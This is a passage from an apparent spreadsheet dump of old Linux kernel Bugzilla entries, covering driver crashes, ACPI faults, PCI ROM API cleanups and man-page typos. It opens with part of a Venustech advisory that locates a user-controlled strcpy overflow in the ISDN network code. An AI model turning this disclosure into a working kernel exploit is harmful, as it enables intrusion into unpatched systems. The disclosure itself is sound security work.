2777 if (cfg-&gt;exclusive &gt; 0) { 2778 unsigned long flags; 2779 2780 /* If binding is exclusive, try to grab the channel */ 2781 spin_lock_irqsave(&amp;dev-&gt;lock, flags); 2782 if ((i = isdn_get_free_channel(ISDN_USAGE_NET, 2783 lp-&gt;l2_proto, lp-&gt;l3_proto, drvidx, 2784 chidx, lp-&gt;msn)) &lt; 0) { 2785 /* Grab failed, because desired channel is in use */ 2786 lp-&gt;exclusive = -1; 2787 spin_unlock_irqrestore(&amp;dev-&gt;lock, flags); 2788 return -EBUSY; 2789 } 2790 /* All went ok, so update isdninfo */ 2791 dev-&gt;usage[i] = ISDN_USAGE_EXCLUSIVE; 2792 isdn_info_update(); 2793 spin_unlock_irqrestore(&amp;dev-&gt;lock, flags); 2794 lp-&gt;exclusive = i; 2795 } else { 2796 /* Non-exclusive binding or unbind. */ 2797 lp-&gt;exclusive = -1; 2798 if ((lp-&gt;pre_device != -1) &amp;&amp; (cfg-&gt;exclusive == -1)) { 2799 isdn_unexclusive_channel(lp-&gt;pre_device, lp-&gt;pre_channel); 2800 isdn_free_channel(lp-&gt;pre_device, lp-&gt;pre_channel, ISDN_USAGE_NET); 2801 drvidx = -1; 2802 chidx = -1; 2803 } 2804 } 2805 strcpy(lp-&gt;msn, cfg-&gt;eaz); *** &lt;- Possible overrun of lp-&gt;msn by cfg-eaz 2806 lp-&gt;pre_device = drvidx; 2807 lp-&gt;pre_channel = chidx; 2808 lp-&gt;onhtime = cfg-&gt;onhtime; 2809 lp-&gt;charge = cfg-&gt;charge; ... 2884 return -ENODEV; 2885 } At line 2805, function strcpy() is invoked. The size of argument lp-&gt;msn is 32 and cfg-&gt;eaz is 256. Because the data of '*cfg' is user-controlled (so cfg-&gt;eaz is user-controlled), it's possible to overrun destination string lp-&gt;msn by string cfg-&gt;eaz. When the length of string 'cfg-&gt;eaz' is greater than 32, a buffer overflow will occur. III.CREDIT: ---------- Venustech AD-LAB discovered this vuln. Thanks to all Venustech AD-Lab guys. Thanks to Coolq. V.DISCLAIMS: ----------- The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. Copyright 1996-2007 VENUSTECH. All Rights Reserved. Terms of use. VENUSTECH Security Lab VENUSTECH INFORMATION TECHNOLOGY CO.,LTD(http://www.venustech.com.cn) Security Trusted {Solution} Provider Service</t>
  </si>
  <si>
    <t>Function tcp_v6_md5_do_del return value has error.</t>
  </si>
  <si>
    <t>2007-11-20 07:12 UTC</t>
  </si>
  <si>
    <t>liangwang</t>
  </si>
  <si>
    <t>2008-09-23 07:43 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: None, I always had this problem with the md5 in tcpv6. Distribution: Hardware Environment: Software Environment: Problem Description: When you creat two or more tcpv6 md5 entries,and you may del someone.For example, if you added two ipv6 address(2000::9, 2000::10) to a sk, so the sk first md5 entry is for 2000::9 and second entry is for 2000::10, and then the sk has two entries. If you want to del the second md5 entry , the funcation "tcp_v6_md5_do_del" will not sub the tp-&gt;md5sig_info-&gt;entries6 for the first loop, because this time the address is not 2000::9.For the second loop, the tp-&gt;md5sig_info-&gt;entries6 will sub 1,but this time tp-&gt;md5sig_info-&gt;entries6 is not 0 but 1, so the funcation return -ENOENT.When application get the return vlaue may occur error. for (i = 0; i &lt; tp-&gt;md5sig_info-&gt;entries6; i++) { if (ipv6_addr_cmp(&amp;tp-&gt;md5sig_info-&gt;keys6[i].addr, peer) == 0) { /* Free the key */ kfree(tp-&gt;md5sig_info-&gt;keys6[i].base.key); tp-&gt;md5sig_info-&gt;entries6--; if (tp-&gt;md5sig_info-&gt;entries6 == 0) { kfree(tp-&gt;md5sig_info-&gt;keys6); tp-&gt;md5sig_info-&gt;keys6 = NULL; tp-&gt;md5sig_info-&gt;alloced6 = 0; tcp_free_md5sig_pool(); /*return 0;*/ /*not in here*/ } else { /* shrink the database */ if (tp-&gt;md5sig_info-&gt;entries6 != i) memmove(&amp;tp-&gt;md5sig_info-&gt;keys6[i], &amp;tp-&gt;md5sig_info-&gt;keys6[i+1], (tp-&gt;md5sig_info-&gt;entries6 - i) * sizeof (tp-&gt;md5sig_info-&gt;keys6[0])); } } return 0;/*should be return here*/ } Steps to reproduce: Create two tcpv6 md5 entry ,and then delete the second.</t>
  </si>
  <si>
    <t>(patch queued)intel_dc21285 needs conversion to kernel ROM API</t>
  </si>
  <si>
    <t>2.6.27-rc7</t>
  </si>
  <si>
    <t>2007-11-20 11:06 UTC</t>
  </si>
  <si>
    <t>New version of this bug, old one was four years old. I marked it invalid. In drivers/mtd/maps/pci.c, intel_dc21285_init() the PCI adapter ROM is being directly manipulated. There is a kernel API for doing this: drivers/pci/rom.c. The kernel ROM API addresses obscure problems that are missed by direct manipulation. drivers/mtd/maps/pci.c should be updated to use this API. Updating mostly involves deleting code.</t>
  </si>
  <si>
    <t>Direct manipulation of PCI ROM in drivers/scsi/qla2xxx/qla_init.c</t>
  </si>
  <si>
    <t>2007-11-20 11:22 UTC</t>
  </si>
  <si>
    <t>2012-05-17 15:09 UTC</t>
  </si>
  <si>
    <t>Code in drivers/scsi/qla2xxx/qla_init.c is directly manipulating the PCI ROMs. There is a kernel API for accessing these ROMs in drivers/pci/rom.c. This driver should be converted to use the common API. drivers/scsi/qla2xxx/qla_init.c: pci_read_config_dword(ha-&gt;pdev, PCI_ROM_ADDRESS, &amp;d); drivers/scsi/qla2xxx/qla_init.c: d &amp;= ~PCI_ROM_ADDRESS_ENABLE; drivers/scsi/qla2xxx/qla_init.c: pci_write_config_dword(ha-&gt;pdev, PCI_ROM_ADDRESS, d); drivers/scsi/qla2xxx/qla_init.c: pci_read_config_dword(ha-&gt;pdev, PCI_ROM_ADDRESS, &amp;d); drivers/scsi/qla2xxx/qla_init.c: d &amp;= ~PCI_ROM_ADDRESS_ENABLE; drivers/scsi/qla2xxx/qla_init.c: pci_write_config_dword(ha-&gt;pdev, PCI_ROM_ADDRESS, d); drivers/scsi/qla2xxx/qla_init.c: pci_read_config_dword(ha-&gt;pdev, PCI_ROM_ADDRESS, &amp;d); drivers/scsi/qla2xxx/qla_init.c: d &amp;= ~PCI_ROM_ADDRESS_ENABLE; drivers/scsi/qla2xxx/qla_init.c: pci_write_config_dword(ha-&gt;pdev, PCI_ROM_ADDRESS, d); drivers/scsi/qla2xxx/qla_init.c: pci_read_config_dword(ha-&gt;pdev, PCI_ROM_ADDRESS, &amp;d); drivers/scsi/qla2xxx/qla_init.c: d &amp;= ~PCI_ROM_ADDRESS_ENABLE; drivers/scsi/qla2xxx/qla_init.c: pci_write_config_dword(ha-&gt;pdev, PCI_ROM_ADDRESS, d);</t>
  </si>
  <si>
    <t>Matrox framebuffer needs to be converted to use PCI ROM API</t>
  </si>
  <si>
    <t>2007-11-20 14:29 UTC</t>
  </si>
  <si>
    <t>2009-03-24 10:36 UTC</t>
  </si>
  <si>
    <t>This code should be updated to use the PCI ROM API pci_read_config_dword(pdev, PCI_OPTION_REG, &amp;opt); pci_write_config_dword(pdev, PCI_OPTION_REG, opt | PCI_OPTION_ENABLE_ROM); pci_read_config_dword(pdev, PCI_ROM_ADDRESS, &amp;biosbase); pci_read_config_dword(pdev, ACCESS_FBINFO(devflags.fbResource), &amp;fbbase); pci_write_config_dword(pdev, PCI_ROM_ADDRESS, (fbbase &amp; PCI_ROM_ADDRESS_MASK) | PCI_ROM_ADDRESS_ENABLE); parse_bios(vaddr_va(ACCESS_FBINFO(video).vbase), &amp;ACCESS_FBINFO(bios)); pci_write_config_dword(pdev, PCI_ROM_ADDRESS, biosbase); pci_write_config_dword(pdev, PCI_OPTION_REG, opt); #ifdef CONFIG_X86 if (!ACCESS_FBINFO(bios).bios_valid) { unsigned char __iomem* b; b = ioremap(0x000C0000, 65536); if (!b) { printk(KERN_INFO "matroxfb: Unable to map legacy BIOS\n"); } else { unsigned int ven = readb(b+0x64+0) | (readb(b+0x64+1) &lt;&lt; 8); unsigned int dev = readb(b+0x64+2) | (readb(b+0x64+3) &lt;&lt; 8); if (ven != pdev-&gt;vendor || dev != pdev-&gt;device) { printk(KERN_INFO "matroxfb: Legacy BIOS is for %04X:%04X, while this device is %04X:%04X\n", ven, dev, pdev-&gt;vendor, pdev-&gt;device); } else { parse_bios(b, &amp;ACCESS_FBINFO(bios)); } iounmap(b); } } #endif</t>
  </si>
  <si>
    <t>panic in rt2x00 driver when resuming after hibernate</t>
  </si>
  <si>
    <t>2007-11-21 07:42 UTC</t>
  </si>
  <si>
    <t>2009-01-03 11:20 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: Debian testing/unstable Hardware Environment: LG LE50 Express laptop Software Environment: i386 kernel, X.org, KDE Problem Description: When resuming from hibernate, the suspend image is loaded but shortly afterwards I get a kernel panic. Steps to reproduce: 1. Boot with the rt2500pci module loaded and wireless interface up. (It is not necessary to associate to an access point.) 2. Hibernate using s2disk. 3. Resume.</t>
  </si>
  <si>
    <t>acpi-cpufreq boot crash</t>
  </si>
  <si>
    <t>2.6.20-2.6.23-rc3</t>
  </si>
  <si>
    <t>2007-11-21 10:58 UTC</t>
  </si>
  <si>
    <t>2008-01-01 10:53 UTC</t>
  </si>
  <si>
    <t>With CONFIG_DEBUG_SLAB=y or CONFIG_SLUB_DEBUG=y, the kernel crashes upon modprobe acpi-cpufreq. This is true from 2.6.20 (earliest tested) through 2.6.23, and includes 2.6.24-rc3 BUG: unable to handle kernel paging request at virtual address 6b6b6b71 printing eip: c025d8ea *pde = 00000000 Oops: 0000 [#1] SMP Modules linked in: acpi_cpufreq freq_table dm_mod parport_pc snd_hda_intel parport ehci_hcd button thermal intel_agp agpgart Pid: 2496, comm: modprobe Not tainted (2.6.24-rc3-g2ffbb837 #3) EIP: 0060:[&lt;c025d8ea&gt;] EFLAGS: 00010202 CPU: 0 EIP is at acpi_ns_get_parent_node+0x6/0x14 EAX: 6b6b6b6b EBX: 0000000a ECX: f75ea650 EDX: 00000000 ESI: f75ea650 EDI: f75ea650 EBP: c0266aef ESP: f76f4d94 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process modprobe (pid: 2496, ti=f76f4000 task=f7f5f080 task.ti=f76f4000) Stack: c025d6c9 f76f4dbc c0266a20 f75ea710 00000000 00000000 c0266aef c0266ee3 f76f4dec c0266b12 00000010 f7c04458 00000000 c0264ecf f76f4dec f7c04de8 f75ea590 f76f4e38 f7047c6c 00000000 c0266ac7 f76f4dec 00000074 00000020 Call Trace: [&lt;c025d6c9&gt;] acpi_ns_get_pathname_length+0xd/0x24 [&lt;c0266a20&gt;] acpi_ut_get_simple_object_size+0x70/0xd9 [&lt;c0266aef&gt;] acpi_ut_get_element_length+0x0/0x43 [&lt;c0266ee3&gt;] acpi_ut_create_generic_state+0x24/0x3d [&lt;c0266b12&gt;] acpi_ut_get_element_length+0x23/0x43 [&lt;c0264ecf&gt;] acpi_ut_walk_package_tree+0x4a/0xb7 [&lt;c0266ac7&gt;] acpi_ut_get_object_size+0x3e/0x66 [&lt;c025d0c7&gt;] acpi_evaluate_object+0x1f2/0x297 [&lt;c04265be&gt;] __mutex_lock_slowpath+0x1ee/0x1f6 [&lt;c02718b0&gt;] acpi_processor_preregister_performance+0xb6/0x55e [&lt;c0166e96&gt;] percpu_populate+0x20/0x26 [&lt;c01659ab&gt;] __kmalloc+0xb2/0xe7 [&lt;c0166e96&gt;] percpu_populate+0x20/0x26 [&lt;c022805d&gt;] __next_cpu+0x12/0x1e [&lt;c0166f3b&gt;] __percpu_populate_mask+0x55/0x65 [&lt;f883605d&gt;] acpi_cpufreq_init+0x5d/0x8f [acpi_cpufreq] [&lt;c01426e5&gt;] sys_init_module+0x14c7/0x15ea [&lt;c01688e8&gt;] do_sync_read+0xc7/0x10a [&lt;c0103dc6&gt;] sysenter_past_esp+0x5f/0x89 [&lt;c0420000&gt;] gss_pipe_downcall+0xc7/0x30a ======================= Code: 04 8d 04 82 89 41 0c 5b c3 89 c2 8d 40 ff 83 f8 fd 76 06 a1 24 92 61 c0 c3 31 c0 80 7a 04 0f 75 02 89 d0 c3 c3 31 d2 85 c0 74 0b &lt;f6&gt; 40 06 01 8b 40 10 74 f7 89 c2 89 d0 c3 31 d2 f6 40 06 01 75 EIP: [&lt;c025d8ea&gt;] acpi_ns_get_parent_node+0x6/0x14 SS:ESP 0068:f76f4d94 /etc/rc5.d/S06cpuspeed: line 112: 2496 Segmentation fault /sbin/modprobe acpi-cpufreq 2&gt; /dev/null</t>
  </si>
  <si>
    <t>Documentation</t>
  </si>
  <si>
    <t>man-pages</t>
  </si>
  <si>
    <t>getlogin(3) typo patch</t>
  </si>
  <si>
    <t>2007-11-22 08:46 UTC</t>
  </si>
  <si>
    <t>Sam Varshavchik</t>
  </si>
  <si>
    <t>2007-11-23 22:59 UTC</t>
  </si>
  <si>
    <t>Real world bugzilla test. There's a typo at the beginning of getlogin(3) in man-pages-2.68</t>
  </si>
  <si>
    <t>Extra blank line in intro(3)</t>
  </si>
  <si>
    <t>2007-11-22 08:49 UTC</t>
  </si>
  <si>
    <t>2007-11-23 23:01 UTC</t>
  </si>
  <si>
    <t>Real world bugzilla test #2 There's an extra blank line at the beginning of intro(3). Red Hat's version of bugzilla allows attachments to be added on the bugzilla new bug entry screen. It's a small timesaver.</t>
  </si>
  <si>
    <t>copy-paste error in mkdirat(2)</t>
  </si>
  <si>
    <t>2007-11-22 08:51 UTC</t>
  </si>
  <si>
    <t>2007-11-23 23:53 UTC</t>
  </si>
  <si>
    <t>Third, and final, test. There's a copy-paste error in mkdirat(2).</t>
  </si>
  <si>
    <t>Problem in joinning a socket to ipv6 multicast address in specific scenario</t>
  </si>
  <si>
    <t>2007-11-22 11:02 UTC</t>
  </si>
  <si>
    <t>Aviad Yehezkel</t>
  </si>
  <si>
    <t>2008-09-23 14:30 UTC</t>
  </si>
  <si>
    <t>Hi, I have a problem in joinning a socket to multicast address in the following scenario (maybe kernel bug): 1. I am changing the mtu size of the eth device to a small size - "ifconfig eth1 mtu 100" 2. After that i am resizing the mtu for it's orginal size - "ifconfig eth1 mtu 1500" 3. Now i am running a program i wrote in c that opens a dgram socket (sock_fd[i] = socket(test_data-&gt;protocol, SOCK_DGRAM, 0);) and join it to multicast ipv6 address. if i am running this program after steps 1+2 i get the following error: "Resource temporarily unavailable" when trying to join the socket to the multicast ipv6 address by the system call : struct ipv6_mreq maddr6_group; ... setsockopt(sock_fd, IPPROTO_IPV6, IPV6_JOIN_GROUP, (char *)&amp;maddr6_group, sizeof(maddr6_group)); but if i am running my program after reset of the driver (before steps 1+2) it is working fine. if i am trying to run the program and join a socket to ipv4 multicast address (instead of ipv6) i get no errors - this doesn't work only when trying to join to ipv6 multicast address. I got this error in broadcom device ("Broadcom Corporation NetXtreme BCM5721 Gigabit Ethernet PCI Express (rev 21)") but i don't think this is a bug in broadcom driver, because i tried it on differnt devices, in some devices i got the following error instead: "Invalid argument" with the same multicast address. As i said before if i am trying to join a socket to multicast ipv6 address before resizing the mtu size it is working fine, all the problems are after step 1+2. All my tries were OS: 1. SLES10.0 - 2.6.16.21-0.8-smp 2. REDHAT5.0 - 2.6.18-8.el5 #1 SMP. I am waiting for an answer, thanks a lot, Aviad Yehezkel.</t>
  </si>
  <si>
    <t>AE_NO_ACPI_TABLES - Acer Travelmate C104TCi</t>
  </si>
  <si>
    <t>2007-11-23 16:59 UTC</t>
  </si>
  <si>
    <t>2008-02-10 16:48 UTC</t>
  </si>
  <si>
    <t>From: TJ I've been debugging an ACPI-disabled-at-boot failure on an Acer Travelmate C104TCi (C100) with a Wistron BIOS. [ 0.000000] DMI 2.3 present. [ 0.000000] ACPI: RSDP 000EC2D0, 0014 (r0 Acer ) [ 0.000000] ACPI: 00000000, F000FF5A (r195 Zÿ F000FF57 Zÿ F000FEA5) [ 27.751333] ACPI: Core revision 20070126 [ 27.751501] ACPI Exception (tbxface-0618): AE_NO_ACPI_TABLES, While loading namespace from ACPI tables [20070126] [ 27.751654] ACPI: Unable to load the System Description Tables [ 27.783596] ACPI: Interpreter disabled. There are several references to this problem around the net and a couple of invasive kernel patches that don't address the cause. I wrote a user-space application that scans memory using the method described in the ACPI specifications. It reports: $ sudo ./find-RSDP find-RSDP version 0.1 © 2007 TJ Licensed on the terms of GPL version 3 Finds ACPI Root System Descriptor Pointer (for supported BIOS's only). 0x00000000FFFFFFFF Memory size 0x00000000000EC2D0 "RSD PTR " 0x00000000000FE030 "RSD PTR " RSDT @ 0FFE0000 OEM: "Acer " sum: 0 0x0000000005FBFE10 "RSD PTR " Unfortunately the kernel function arch/i386/kernel/acpi/boot.c::acpi_scan_rsdp() doesn't fully implement the ACPI specification - it simply looks for the first "RSD PTR " signature but doesn't check it has found a valid table by calculating the checksum. Because this series of BIOSs happen to have multiple instances of "RSD PTR " and an invalid instance appears first in memory, the kernel tries to use an invalid pointer to the RSDT, leading to the problems.</t>
  </si>
  <si>
    <t>xfrm_state_lock: possible circular locking dependency detected</t>
  </si>
  <si>
    <t>2007-11-24 03:24 UTC</t>
  </si>
  <si>
    <t>2007-12-01 13:36 UTC</t>
  </si>
  <si>
    <t>Subject : xfrm_state_lock: possible circular locking dependency detected Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; References : http://lkml.org/lkml/2007/11/23/103 Handled-By : Herbert Xu &lt;herbert@gondor.apana.org.au&gt;</t>
  </si>
  <si>
    <t>2.6.24-rc3 can't see sd partitions on Alpha</t>
  </si>
  <si>
    <t>2007-11-25 03:55 UTC</t>
  </si>
  <si>
    <t>2007-12-20 15:51 UTC</t>
  </si>
  <si>
    <t>Ivan Kokshaysky</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc3 can't see sd partitions on Alpha Submitter : Bob Tracy &lt;rct@gherkin.frus.com&gt; References : http://lkml.org/lkml/2007/11/18/3 Handled-By : Andrew Morton &lt;akpm@linux-foundation.org&gt;</t>
  </si>
  <si>
    <t>[pata-pcmcia] failed to set xfermode</t>
  </si>
  <si>
    <t>2.6.20; 2.6.22</t>
  </si>
  <si>
    <t>2007-11-26 01:45 UTC</t>
  </si>
  <si>
    <t>2009-03-24 07:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Ubuntu Fiesty, Gutsy Hardware Environment: KINGSTON DP-PCM2/5GB , Kingston 5G pcmcia HD is being recognized but not getting set up for access. [ 26.192474] ata3: PATA max PIO0 cmd 0x00012040 ctl 0x0001204e bmdma 0x00000000 irq 3 [ 26.192496] scsi5 : pata_pcmcia [ 26.236921] PCI: Setting latency timer of device 0000:00:1b.0 to 64 [ 26.362176] ata3.00: ATA-0: KINGSTON DP-PCM2/5GB, V2.11 B, max PIO2 [ 26.362182] ata3.00: 9818550 sectors, multi 16: LBA [ 26.362311] ata3.00: failed to set xfermode (err_mask=0x1) [ 26.362314] ata3: failed to recover some devices, retrying in 5 secs</t>
  </si>
  <si>
    <t>cp2101 error -5 (with possible fix)</t>
  </si>
  <si>
    <t>2.6.24-rc3-git1</t>
  </si>
  <si>
    <t>2007-11-26 06:48 UTC</t>
  </si>
  <si>
    <t>Erik Oomen</t>
  </si>
  <si>
    <t>2008-09-23 07:25 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian etch Hardware Environment: AMD64 X2 Software Environment: x86_64 Problem Description: Attaching a cp210x based device results in an 'cp2101: probe of 2-4.1:1.0 failed with error -5'. This error can be resolved by setting: .num_interrupt_in = NUM_DONT_CARE, .num_bulk_in = NUM_DONT_CARE, .num_bulk_out = NUM_DONT_CARE, in the static struct usb_serial_driver cp2101_device .</t>
  </si>
  <si>
    <t>NIC sis 191 failed</t>
  </si>
  <si>
    <t>2007-11-28 09:35 UTC</t>
  </si>
  <si>
    <t>WIPAT SRUTIPROM</t>
  </si>
  <si>
    <t>2009-09-21 20:22 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: fedora 8 Hardware Environment: NIC integrated on mainboard ASUSTeK P5S-MX SE Software Environment: fedora 8 live CD Problem Description: part of output from "lspci -nn" : ... 00:04.0 Ethernet controller [0200]: Silicon Integrated Systems [SiS] 191 Gigabit Ethernet Adapter [1039:0191] (rev 02) ... part of output from "dmseg": ... sis190 Gigabit Ethernet driver 1.2 loaded. ACPI: PCI Interrupt 0000:00:04.0[A] -&gt; GSI 19 (level, low) -&gt; IRQ 16 PCI: Setting latency timer of device 0000:00:04.0 to 64 0000:00:04.0: Read MAC address from APC. 0000:00:04.0: Can not find ISA bridge. ACPI: PCI interrupt for device 0000:00:04.0 disabled sis190: probe of 0000:00:04.0 failed with error -5 ... Steps to reproduce:</t>
  </si>
  <si>
    <t>r8169, swiotlb, 4GB RAM, breakage</t>
  </si>
  <si>
    <t>2007-11-28 13:43 UTC</t>
  </si>
  <si>
    <t>2011-07-14 08:00 UTC</t>
  </si>
  <si>
    <t>(Shameless repost from my mail to LKML. Seems to have gone quiet so I thought I wouldn't let this bugger get lost.) I have recently assembled a Core 2 Duo system with 4GB RAM and I believe there might be a bug in the r8169 driver in &gt;4GB RAM configurations. Initially I can use one of two active r8169 NICs on the motherboard with this quantity of RAM with other devices, without issue. But after some amount of data (generally about 50MB), no more network packets are sent/received. The "choke" affects other devices on the system too, notably libata, which does not recover gracefully. In my logs, I see a stream of: DMA: Out of SW-IOMMU space for 7222 bytes at device 0000:04:00.0 DMA: Out of SW-IOMMU space for 7222 bytes at device 0000:04:00.0 The device 0000:04:00.0 corresponds to one of the r8169s. The reason I believe r8169 is at fault is that I was doing a rebuild of my RAID5 across 3 SATA drives via libata's ahci driver, and transferring over the network. When the "choke" occurred the RAID sync stopped, libata errors were seen, and I simply did a "ifconfig br0 down" (which contained the r8169) and the messages went away. Bringing the NIC up again would see some initial functionality then very rapidly it would go back to the same error messages. The Intel chipset I am using does not support any kind of hardware IOMMU, so I am forced to use swiotlb in a 4GB RAM configuration. In an attempt to delay the failures, I used the swiotlb option to increase the swiotlb's page allocation with "swiotlb=65536" (which seems to correspond to a 256MB bounce buffer). Assuming both libata and r8169 use the swiotlb, and both systems are impaired when these messages appear, removing r8169 would appear to be key. Indeed, if there is no significant libata activity, the problem still occurs on the NIC within approximately the same amount of transfer. This option delays the failure for some time but it will happen eventually, which makes me suspicious that maybe the driver is somehow pinning an area of the buffer and not releasing it. (I hunted bugzilla for reports similar to this one, but couldn't find anything.) Having tested the r8169 driver on an AMD system I did not experience the same problems with 4GB RAM, so this could be a bug specific to swiotlb. I would have added more people to CC but I have no idea who might be responsible. mem=2000M on the cmdline works around this issue.</t>
  </si>
  <si>
    <t>2.6.24-rc3-git2</t>
  </si>
  <si>
    <t>[build bug] SCTP, net/sctp/auth.c, ./net/rxrpc/ar-key.c fails to build</t>
  </si>
  <si>
    <t>2007-11-28 15:39 UTC</t>
  </si>
  <si>
    <t>2007-12-06 03:07 UTC</t>
  </si>
  <si>
    <t>Subject : [build bug] SCTP, net/sctp/auth.c, ./net/rxrpc/ar-key.c fails to build Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; References : http://lkml.org/lkml/2007/11/28/107 Handled-By : Vlad Yasevich &lt;vladislav.yasevich@hp.com&gt; Patch : http://lkml.org/lkml/2007/11/28/158</t>
  </si>
  <si>
    <t>2.6.24-rc3-git2 softlockup detected</t>
  </si>
  <si>
    <t>2007-11-28 15:46 UTC</t>
  </si>
  <si>
    <t>2007-12-20 15:53 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc3-git2 softlockup detected Submitter : Kamalesh Babulal &lt;kamalesh@linux.vnet.ibm.com&gt; References : http://lkml.org/lkml/2007/11/28/16 Handled-By : Andrew Morton &lt;akpm@linux-foundation.org&gt;</t>
  </si>
  <si>
    <t>[parisc] 2.6.24-rc3 (64-bit, smp) fails to boot on 9000/785/J5600</t>
  </si>
  <si>
    <t>2007-11-28 15:50 UTC</t>
  </si>
  <si>
    <t>2007-12-07 14:10 UTC</t>
  </si>
  <si>
    <t>Kyle McMartin</t>
  </si>
  <si>
    <t>Subject : [parisc] 2.6.24-rc3 (64-bit, smp) fails to boot on 9000/785/J5600 Submitter : Frans Pop &lt;elendil@planet.nl&gt; References : http://lkml.org/lkml/2007/11/27/72 Handled-By : Kyle McMartin &lt;kyle@mcmartin.ca&gt;</t>
  </si>
  <si>
    <t>jiffies counter leaps on CPU frequency changes</t>
  </si>
  <si>
    <t>2007-11-29 08:36 UTC</t>
  </si>
  <si>
    <t>Stefano Brivio</t>
  </si>
  <si>
    <t>2011-07-30 05:31 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown. I'm sorry, I can't test 2.6.23 because of some dm-crypt issue. Distribution: Gentoo. Hardware Environment: st3@morte ~ $ cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 13 model name : Intel(R) Pentium(R) M processor 1.50GHz stepping : 6 cpu MHz : 1500.000 cache size : 2048 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr mce cx8 sep mtrr pge mca cmov pat clflush dts acpi mmx fxsr sse sse2 ss tm pbe bts est tm2 bogomips : 2993.49 clflush size : 64 Software environment: acpi-cpufreq module. Problem Description: when I switch the CPU frequency, the jiffies counter gets scaled by the ratio of &lt;old_frequency/new_frequency&gt;, e.g.: morte ~ # cpuspeedy max cpuspeedy: CPU speed is now 1.50 GHz (100%) temperature is 55 C morte ~ # tail -n1 /var/log/messages [10609.463888] wmaster0: STA 00:14:c1:35:8d:eb Average rate: 10 (50/5) morte ~ # cpuspeedy med cpuspeedy: CPU speed is now 1 GHz (66%) temperature is 72 C [15996.701445] wmaster0: STA 00:14:c1:35:8d:eb Average rate: 10 (60/6) This isn't just an aesthetic issue, as many device drivers rely on the jiffies counter. Steps to reproduce: see above.</t>
  </si>
  <si>
    <t>drivers/infiniband/hw/amso1100/c2_intr.c: possible NULL dereference</t>
  </si>
  <si>
    <t>2007-11-29 15:46 UTC</t>
  </si>
  <si>
    <t>Marcio Buss</t>
  </si>
  <si>
    <t>2008-05-19 23:30 UTC</t>
  </si>
  <si>
    <t>c2_intr.c has a nil pointer dereference on line 177.</t>
  </si>
  <si>
    <t>kernel GPF in 2.6.24 (g09f345da)</t>
  </si>
  <si>
    <t>2.6.24rc3 g09f345da</t>
  </si>
  <si>
    <t>2007-12-01 11:54 UTC</t>
  </si>
  <si>
    <t>2007-12-17 15:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22.12 Distribution: openSUSE 10.3 Hardware Environment: Athlon XP 2200+ Software Environment: openSUSE 10.3 Problem Description: instant kernel GPF. Steps to reproduce:load module aoe (vanilla), type 'mkfs.ext3 /dev/etherd/e0.0', and the kernel GPFs. Will be attaching jpg of screen - sorry, no other way to capture GPF for me.</t>
  </si>
  <si>
    <t>Freezer: JFFS2 garbage collector freezing issue</t>
  </si>
  <si>
    <t>2007-12-01 12:48 UTC</t>
  </si>
  <si>
    <t>2007-12-07 17:44 UTC</t>
  </si>
  <si>
    <t>Subject : Freezer: Fix JFFS2 garbage collector freezing issue Submitter : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; References : http://lkml.org/lkml/2007/12/1/94 Handled-By : Patch : http://lkml.org/lkml/2007/12/1/94</t>
  </si>
  <si>
    <t>buggy firmware expects four-byte IRQ resource descriptor - 2.6.21 regression - (was: Serial port disappears after Suspend on Toshiba R25)</t>
  </si>
  <si>
    <t>2.6.21-rc4 and newer</t>
  </si>
  <si>
    <t>2007-12-01 18:27 UTC</t>
  </si>
  <si>
    <t>Tom Jaeger</t>
  </si>
  <si>
    <t>2008-06-12 22:06 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: v2.6.21-rc3 (908e0a8a265fe8057604a9a30aec3f0be7bb5ebb) Distribution: Ubuntu 7.10 Hardware Environment: Toshiba Satellite R25 Tablet PC (x86) Software Environment: Linux tthomas 2.6.21-rc3 #13 SMP Sat Dec 1 20:38:13 EST 2007 i686 GNU/Linux Problem Description: Recent kernel versions fail to wake up the serial port after both Suspend to RAM and Suspend to Disk, which causes the tablet pen to be unusable. Trying to access the serial port result in a "ttyS0: LSR safety check engaged!" error message, and operation cannot be restored via "sudo setserial /dev/ttyS0 uart 16550A port 0x0338 irq 4". Using git bisect, I identified the kernel version where this problem first appeared, the offending patch is: Author: Michael Karcher &lt;bugzilla-kernel@mkarcher.dialup.fu-berlin.de&gt; 2007-03-08 23:29:29 Committer: Len Brown &lt;len.brown@intel.com&gt; 2007-03-08 23:29:29 Parent: 908e0a8a265fe8057604a9a30aec3f0be7bb5ebb ([PATCH] ecryptfs: nested locking annotation) Branches: remotes/origin/master, master, bisect Follows: v2.6.21-rc3 Precedes: v2.6.21-rc4 ACPI: fix parallel port IRQ after resume from S3 The PNPACPI resource flags were broken. This would apply to re-enabling a device any-time after boot, not just after resume from S3. http://bugzilla.kernel.org/show_bug.cgi?id=6316 Acked-by: Shaohua Li &lt;shaohua.li@intel.com&gt; Signed-off-by: Len Brown &lt;len.brown@intel.com&gt; I'll attach the output of dmesg and my kernel configuration. This uses the first kernel version where the bug occurs; if you prefer, I can repeat the process on the latest kernel. Thank you.</t>
  </si>
  <si>
    <t>cpu locked at 800MHz due to _PPC - FSC Lifebook E8410 Core2Duo 2.4GHz</t>
  </si>
  <si>
    <t>2007-12-01 22:14 UTC</t>
  </si>
  <si>
    <t>Michael Reinelt</t>
  </si>
  <si>
    <t>2008-10-16 23:23 UTC</t>
  </si>
  <si>
